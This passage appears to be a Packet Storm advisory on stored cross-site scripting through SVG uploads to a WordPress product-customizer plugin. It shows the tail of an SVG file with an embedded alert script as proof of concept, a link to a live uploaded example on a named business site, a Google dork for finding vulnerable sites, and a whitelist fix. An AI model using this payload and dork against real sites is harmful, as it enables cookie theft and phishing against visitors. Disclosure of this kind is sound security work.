<path d="M2510 1505 c0 0 -1 -51 -3 -113 l-2 -112 30 0 31 0 -2 112 -3 111 -25 2 c-14 0 -26 1 -26 0z m32 -102 c-5 -83 -9 -90 -11 -20 0 37 2 67 7 67 4 0 6 -21 4 -47z"/>
<path d="M2689 1500 c0 -3 -1 -53 -2 -112 l-2 -108 88 0 88 0 -3 111 -3 111
-83 1 c-45 1 -82 0 -83 -3z m42 -43 c-6 -6 -11 -35 -11 -64 0 -29 -3 -53 -7
-53 -8 0 -6 104 2 128 3 7 10 10 16 7 8 -5 8 -10 0 -18z m93 7 c5 -14 4 -15
-9 -4 -17 14 -19 20 -6 20 5 0 12 -7 15 -16z m-21 -16 c-2 -5 -3 -33 -3 -63 0
-54 0 -55 -30 -55 -30 0 -30 0 -30 58 0 32 2 61 5 63 7 8 60 5 58 -3z m37 -74
c0 -41 -4 -63 -10 -59 -5 3 -10 1 -10 -4 0 -6 -7 -11 -17 -11 -15 0 -15 1 0
18 11 12 17 36 17 70 0 29 5 52 10 52 6 0 10 -29 10 -66z m-103 -70 c-9 -9
-28 6 -21 18 4 6 10 6 17 -1 6 -6 8 -13 4 -17z"/>
<path d="M2080 1459 c0 -5 5 -7 10 -4 6 3 10 8 10 11 0 2 -4 4 -10 4 -5 0 -10
-5 -10 -11z"/>
<path d="M129 1110 c-1 -3 -2 -53 -3 -112 l-1 -108 87 0 88 0 0 113 0 112 -85
0 c-47 0 -86 -2 -86 -5z m42 -34 c-5 -6 -11 -29 -14 -51 -4 -34 -4 -33 -4 11
0 35 4 51 14 51 8 0 9 -4 4 -11z m98 -3 c0 -11 -3 -13 -6 -5 -11 28 -23 -3
-23 -64 l0 -64 -30 0 -31 0 3 63 c3 58 5 62 26 60 13 -2 25 4 28 12 8 21 34
19 33 -2z m8 -55 c-3 -7 -5 -2 -5 12 0 14 2 19 5 13 2 -7 2 -19 0 -25z m0 -50
c-3 -8 -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z m-107 -41 c0 -18 -2 -19
-10 -7 -13 20 -13 43 0 35 6 -3 10 -16 10 -28z m103 3 c-3 -12 -8 -19 -11 -16
-5 6 5 36 12 36 2 0 2 -9 -1 -20z"/>
<path d="M420 1004 l0 -114 30 0 30 0 0 113 0 114 -30 1 -30 1 0 -115z"/>
<path d="M600 1115 c-1 0 -2 -51 -3 -113 l-2 -112 88 0 88 0 -3 111 -3 111
-83 1 c-45 1 -82 2 -82 2z m42 -43 c-7 -2 -12 -16 -13 -30 0 -15 -3 -21 -6
-14 -8 21 6 64 19 56 9 -6 9 -9 0 -12z m95 3 c0 -8 -4 -12 -9 -9 -4 3 -8 9 -8
15 0 5 4 9 8 9 5 0 9 -7 9 -15z m-27 -70 l0 -65 -30 0 c-30 0 -30 0 -30 58 0
65 3 72 37 72 22 0 23 -4 23 -65z m-48 -85 c23 -9 23 -9 -3 -9 -27 -1 -40 15
-38 47 0 12 3 10 9 -6 5 -12 20 -27 32 -32z m88 6 c0 -17 -2 -18 -10 -6 -7 11
-10 11 -10 2 0 -7 -4 -11 -10 -7 -13 8 -2 32 15 32 9 0 15 -10 15 -21z"/>
<path d="M884 1111 c-2 -2 -4 -53 -4 -113 l0 -108 33 0 32 0 -3 114 -3 114
-25 -2 c-14 0 -28 -3 -30 -5z m23 -53 c-3 -7 -5 -2 -5 12 0 14 2 19 5 13 2 -7
2 -19 0 -25z m13 -78 c0 -5 -4 -10 -10 -10 -5 0 -10 5 -10 10 0 6 5 10 10 10
6 0 10 -4 10 -10z"/>
<path d="M2020 1111 c-24 -5 -34 -11 -32 -21 2 -8 1 -12 -3 -8 -4 4 -25 -3
-46 -14 -38 -20 -39 -21 -39 -77 0 -31 -3 -66 -6 -78 -6 -23 -5 -23 85 -23
l91 0 0 115 c0 63 -3 114 -7 114 -5 -1 -24 -5 -43 -8z m29 -58 c-1 -17 -3 -21
-6 -10 -2 9 -9 17 -14 17 -5 0 -9 5 -9 10 0 6 7 10 15 10 10 0 15 -9 14 -27z
m-39 -48 l0 -65 -30 0 c-30 0 -30 0 -30 58 0 65 3 72 37 72 22 0 23 -4 23 -65z
m-83 30 c0 -8 -4 -15 -9 -15 -10 0 -11 14 -1 23 9 10 10 9 10 -8z m16 -92 c4
-19 2 -33 -3 -33 -6 0 -10 1 -10 3 -10 64 -10 81 -2 72 5 -5 12 -25 15 -42z
m101 15 c-4 -13 -7 -29 -7 -35 0 -7 -6 -13 -12 -13 -9 0 -9 9 -1 35 6 19 15
35 19 35 5 0 5 -10 1 -22z"/>
<path d="M2210 1003 l0 -113 88 0 87 0 0 111 0 110 -88 2 -87 2 0 -112z m59
75 c6 -7 22 -13 34 -13 20 0 22 -6 25 -62 l3 -63 -31 0 -30 0 0 59 c0 36 -5
63 -13 69 -20 17 -10 -118 11 -140 9 -11 11 -18 4 -18 -19 0 -30 33 -32 100
-1 36 -2 68 -1 73 2 11 15 9 30 -5z m90 -53 c-1 -77 -11 -110 -32 -111 -10 -1
-12 0 -3 3 27 8 36 131 11 157 -14 13 -13 15 5 13 18 -1 20 -8 19 -62z"/>
<path d="M2530 1115 c0 0 -1 -51 -3 -113 l-2 -112 88 0 87 0 0 113 0 112 -85
0 c-47 0 -85 0 -85 0z m33 -67 c-7 -59 -13 -61 -13 -5 0 26 4 47 9 47 4 0 6
-19 4 -42z m110 21 c-4 -15 -8 -17 -14 -8 -8 14 -3 29 11 29 4 0 6 -9 3 -21z
m-33 -66 c0 -63 0 -63 -29 -63 -28 0 -29 1 -30 57 0 67 1 69 33 69 25 0 26 -2
26 -63z m34 -21 c-2 -67 -3 -72 -15 -72 -5 0 -7 5 -3 12 4 6 6 29 6 51 -2 33
3 57 11 57 1 0 1 -21 1 -48z"/>
<path d="M2800 1003 l0 -113 30 0 30 0 0 113 0 114 -30 0 -30 0 0 -114z m39
10 c-1 -67 -2 -67 -10 -23 -11 63 -11 90 1 90 6 0 9 -28 9 -67z"/>
<path d="M1870 1080 c-66 -23 -63 -23 -54 -8 4 7 3 8 -5 4 -6 -4 -9 -11 -6
-15 7 -13 -65 -58 -112 -70 -23 -7 -67 -25 -98 -41 -58 -31 -95 -38 -95 -19 0
5 -4 8 -9 5 -5 -4 -22 -1 -38 5 -15 6 -40 12 -55 14 -15 2 -38 11 -52 20 -27
18 -98 33 -81 17 6 -5 36 -19 67 -32 32 -12 55 -26 52 -31 -3 -5 1 -6 9 -3 8
3 42 -4 75 -15 74 -25 109 -27 114 -5 2 9 37 30 87 50 47 19 85 33 86 31 1 -1
-2 -15 -6 -32 -4 -16 -7 -22 -8 -12 -2 31 -26 13 -29 -21 -3 -30 -1 -32 27
-32 31 0 31 0 32 58 l0 57 70 35 c39 19 75 41 81 47 13 16 14 16 -52 -7z"/>
<path d="M1180 770 c0 -5 5 -10 11 -10 5 0 7 5 4 10 -3 6 -8 10 -11 10 -2 0
-4 -4 -4 -10z"/>
<path d="M150 634 c0 -74 4 -113 10 -109 6 3 10 26 10 50 0 44 0 44 33 39 46
-7 97 26 97 63 0 50 -33 73 -104 73 l-46 0 0 -116z m111 86 c26 -14 24 -55 -3
-74 -12 -9 -37 -16 -55 -16 -33 0 -33 0 -33 50 l0 50 36 0 c19 0 44 -5 55 -10z"/>
<path d="M562 638 c2 -69 7 -112 13 -110 6 1 10 24 10 50 0 44 2 47 24 44 13
-2 44 -26 69 -53 24 -27 48 -46 53 -43 5 3 -11 26 -36 52 l-44 46 29 12 c44
19 51 61 16 91 -21 18 -39 23 -82 23 l-54 0 2 -112z m122 76 c21 -20 20 -30
-4 -54 -13 -13 -33 -20 -60 -20 l-40 0 0 45 0 45 44 0 c27 0 51 -6 60 -16z"/>
<path d="M1023 729 c-57 -36 -67 -123 -20 -166 53 -49 105 -56 158 -20 44 29
62 81 47 131 -22 70 -118 98 -185 55z m142 -25 c38 -41 31 -116 -14 -151 -29
-22 -95 -16 -125 12 -36 34 -37 105 -1 140 35 36 106 35 140 -1z"/>
<path d="M1521 658 c-1 -50 -7 -98 -13 -105 -6 -7 -26 -13 -45 -13 -20 0 -32
-4 -28 -10 10 -17 60 -11 82 10 13 11 24 38 28 62 8 58 2 141 -12 145 -7 3
-11 -27 -12 -89z"/>
<path d="M1830 645 c0 -58 -1 -108 -2 -112 -2 -5 32 -9 75 -11 48 -2 77 1 77
8 0 6 -27 10 -65 10 l-65 0 0 45 0 45 55 0 c30 0 55 5 55 10 0 6 -25 10 -55
10 l-55 0 0 40 0 40 65 0 c37 0 65 4 65 10 0 6 -32 10 -75 10 l-75 0 0 -105z"/>
<path d="M2278 734 c-32 -17 -58 -62 -58 -100 0 -61 59 -114 127 -114 29 0 83
26 83 40 0 15 -16 12 -30 -5 -15 -18 -82 -20 -112 -4 -11 6 -26 26 -34 46 -30
72 12 133 92 133 23 0 46 -4 49 -10 7 -12 35 -13 35 -2 0 30 -107 41 -152 16z"/>
<path d="M2660 740 c0 -5 21 -10 46 -10 l45 0 -2 -102 c-1 -69 2 -103 10 -106
8 -3 11 28 11 102 l0 106 45 0 c25 0 45 5 45 10 0 6 -40 10 -100 10 -60 0
-100 -4 -100 -10z"/>
<path d="M481 504 c0 -11 3 -14 6 -6 3 7 2 16 -1 19 -3 4 -6 -2 -5 -13z"/>
<path d="M2805 381 c-24 -5 -35 -17 -57 -59 l-27 -53 -27 55 c-25 52 -30 56
-62 56 l-34 0 48 -67 c40 -56 48 -75 49 -113 0 -43 1 -45 30 -45 29 0 30 1 27
43 -3 37 2 50 47 112 28 38 47 71 43 73 -4 2 -20 1 -37 -2z m-78 -163 c-3 -8
-6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z"/>
<path d="M157 268 l2 -113 28 0 28 1 3 112 3 112 -33 0 -33 0 2 -112z"/>
<path d="M340 266 l0 -113 25 0 c24 0 25 2 25 62 0 43 -5 66 -15 75 -18 15
-16 57 2 57 15 0 17 -13 3 -22 -5 -3 -7 -12 -3 -21 3 -8 8 -13 10 -10 3 2 27
-21 55 -52 70 -79 70 -79 96 -87 22 -6 22 -6 22 109 l0 116 -25 0 c-24 0 -25
-2 -25 -64 0 -53 3 -65 18 -69 14 -4 14 -5 -3 -6 -13 0 -41 24 -80 68 -40 46
-68 70 -82 70 -23 1 -23 -1 -23 -113z m65 54 c-3 -5 -12 -10 -18 -10 -7 0 -6
4 3 10 19 12 23 12 15 0z m115 -115 c0 -8 -2 -15 -4 -15 -2 0 -6 7 -10 15 -3
8 -1 15 4 15 6 0 10 -7 10 -15z"/>
<path d="M696 355 c-30 -27 -29 -26 -17 -58 7 -17 25 -30 60 -43 54 -19 64
-36 31 -54 -15 -8 -27 -7 -49 4 -26 14 -30 14 -45 -3 -15 -17 -14 -19 24 -36
52 -23 104 -12 134 28 19 26 19 30 6 54 -9 15 -33 32 -60 42 -27 10 -46 24
-48 35 -3 15 3 17 49 14 43 -2 54 0 57 13 3 19 -24 29 -79 29 -25 0 -45 -8
-63 -25z"/>
<path d="M950 268 l0 -113 82 2 c77 1 83 3 86 24 4 21 1 22 -52 16 l-56 -6 0
30 c0 28 2 29 44 29 40 0 44 2 39 21 -5 18 -11 19 -44 14 -38 -7 -39 -6 -39
24 0 31 0 31 55 31 48 0 55 2 55 20 0 18 -7 20 -85 20 l-85 0 0 -112z m37 60
c-3 -8 -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z m9 -56 c-4 -26 -21 -24
-22 2 -1 16 3 23 11 20 7 -3 12 -13 11 -22z"/>
<path d="M1260 365 c-46 -25 -67 -92 -44 -141 29 -61 103 -87 167 -60 60 24
44 54 -19 37 -68 -19 -115 29 -94 95 13 38 32 46 99 42 28 -2 45 1 48 9 11 30
-110 44 -157 18z"/>
<path d="M1522 289 c3 -82 5 -92 28 -109 36 -28 83 -33 126 -15 55 23 63 39
64 133 l0 82 -30 0 -30 0 0 -78 c0 -85 -8 -102 -50 -102 -42 0 -50 17 -50 102
l0 78 -31 0 -31 0 4 -91z m188 -69 c-6 -11 -13 -20 -16 -20 -2 0 0 9 6 20 6
11 13 20 16 20 2 0 0 -9 -6 -20z"/>
<path d="M1860 267 l0 -114 31 0 c30 0 31 1 27 44 -3 35 0 43 14 43 10 0 27
-17 40 -39 17 -31 30 -40 57 -45 19 -3 37 -3 40 -1 2 3 -15 27 -37 54 -39 46
-40 50 -22 56 26 8 40 36 33 64 -8 32 -54 51 -123 51 l-60 0 0 -113z m125 63
c12 -20 -6 -47 -38 -57 l-32 -10 3 39 c4 34 7 38 32 38 16 0 32 -5 35 -10z
m32 -12 c-3 -8 -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z m-120 -70 c-3
-8 -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z"/>
<path d="M2160 266 l0 -113 30 1 30 1 0 113 0 112 -30 0 -30 0 0 -114z m37
-38 c-3 -8 -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z"/>
<path d="M2320 360 c0 -17 7 -20 40 -20 l40 0 0 -93 0 -94 30 0 30 0 0 94 0
93 35 0 c28 0 35 4 35 20 0 19 -7 20 -105 20 -98 0 -105 -1 -105 -20z m110
-35 c0 -5 -5 -3 -10 5 -5 8 -10 20 -10 25 0 6 5 3 10 -5 5 -8 10 -19 10 -25z
m8 -56 c-3 -20 -5 -19 -9 9 -3 20 -2 29 4 23 5 -5 7 -19 5 -32z"/>
<path d="M818 123 c7 -3 16 -2 19 1 4 3 -2 6 -13 5 -11 0 -14 -3 -6 -6z"/>
</g>
<script type="text/javascript">
alert("@insecurity");
</script>
</svg>

-------------------------------------------------------------------------------------------------------------

Here is a live example:
https://www.saltsidecreations.com/wp-content/uploads/fancy_products_uploads/2017/04/28/insecurity.svg

This could have a variety of impacts ranging from stealing cookies and regular XSS-related risks to a highly
effective spear phishing campaign

Google Dork: inurl:fancy_products_uploads

-------------------------------------------------------------------------------------------------------------

How to fix: Use whitelist for file upload (e.g. only allow JPG and PNG, no .svg)

There's also multiple full path disclosure for this plugin but WP is riddled with FPD. If you're interested then
get in touch (although im pretty sure there's tons of files in /wp-includes/ that will give you FPD anyway presuming no error_reporting(0) set)


[+]---------------------------------------------------------[+]
| CONTACT US: |
| |
| IRC: irc.insecurity.zone (6667/6697) #insecurity |
| Twitter: @insecurity |
| Website: insecurity.zone |
[+]---------------------------------------------------------[+]

Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    17 Files
  • 8
    Oct 8th
    66 Files
  • 9
    Oct 9th
    25 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    21 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    14 Files
  • 15
    Oct 15th
    49 Files
  • 16
    Oct 16th
    28 Files
  • 17
    Oct 17th
    23 Files
  • 18
    Oct 18th
    10 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    5 Files
  • 22
    Oct 22nd
    12 Files
  • 23
    Oct 23rd
    23 Files
  • 24
    Oct 24th
    8 Files
  • 25
    Oct 25th
    10 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    7 Files
  • 29
    Oct 29th
    17 Files
  • 30
    Oct 30th
    39 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close